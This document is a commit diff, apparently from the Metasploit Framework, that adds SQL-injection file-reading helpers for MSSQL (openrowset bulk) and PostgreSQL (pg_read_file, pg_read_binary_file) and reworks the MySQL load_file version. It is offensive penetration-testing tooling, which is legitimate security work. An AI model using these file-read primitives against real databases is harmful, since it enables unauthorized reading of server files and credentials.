Add method #read_from_file for MSSQL and PostgreSQL, and update the MySQL #read_from_file method

red0xff · red0xff · commit 6d9c789f4d0e · 2022-06-06T23:07:25.000+02:00
diff --git a/lib/msf/core/exploit/sqli/mssqli/common.rb b/lib/msf/core/exploit/sqli/mssqli/common.rb
@@ -192,6 +192,24 @@ def write_to_file(fpath, data)
       run_sql("select '#{data}' into dumpfile '#{fpath}'")
     end
 
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
+      expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
+      output = if @truncation_length
+        truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
+        "from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      else
+        run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
     private
 
     #
diff --git a/lib/msf/core/exploit/sqli/mysqli/common.rb b/lib/msf/core/exploit/sqli/mysqli/common.rb
@@ -213,10 +213,11 @@ def write_to_file(fpath, data)
     #
     # Attempt reading from a file on the filesystem, requires having the FILE privilege
     # @param fpath [String] The path of the file to read
+    # @param binary [Boolean] Whether the target file is a binary one or not
     # @return [String] The content of the file if reading was successful
     #
-    def read_from_file(fpath)
-      run_sql("select load_file('#{fpath}')")
+    def read_from_file(fpath, binary=false)
+      call_function("load_file('#{fpath}')")
     end
 
     private
diff --git a/lib/msf/core/exploit/sqli/postgresqli/common.rb b/lib/msf/core/exploit/sqli/postgresqli/common.rb
@@ -13,7 +13,7 @@ class Common < Msf::Exploit::SQLi::Common
     #
     ENCODERS = {
       base64: {
-        encode: 'encode(^DATA^::bytea, \'base64\')',
+        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
         decode: proc { |data| Base64.decode64(data) }
       },
       hex: {
@@ -202,6 +202,22 @@ def write_to_file(fname, data)
       raw_run_sql("copy (select '#{data}') to '#{fname}'")
     end
 
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      if binary
+        # pg_read_binary_file returns bytea
+        # an encoder might be needed
+        call_function("pg_read_binary_file('#{fpath}')")
+      else
+        call_function("pg_read_file('#{fpath}')")
+      end
+    end
+
     private
 
     #

Original file line number	Diff line number	Diff line change
`@@ -213,10 +213,11 @@ def write_to_file(fpath, data)`
`213`	`213`	`#`
`214`	`214`	`# Attempt reading from a file on the filesystem, requires having the FILE privilege`
`215`	`215`	`# @param fpath [String] The path of the file to read`
	`216`	`+ # @param binary [Boolean] Whether the target file is a binary one or not`
`216`	`217`	`# @return [String] The content of the file if reading was successful`
`217`	`218`	`#`
`218`		`- def read_from_file(fpath)`
`219`		`- run_sql("select load_file('#{fpath}')")`
	`219`	`+ def read_from_file(fpath, binary=false)`
	`220`	`+ call_function("load_file('#{fpath}')")`
`220`	`221`	`end`
`221`	`222`
`222`	`223`	`private`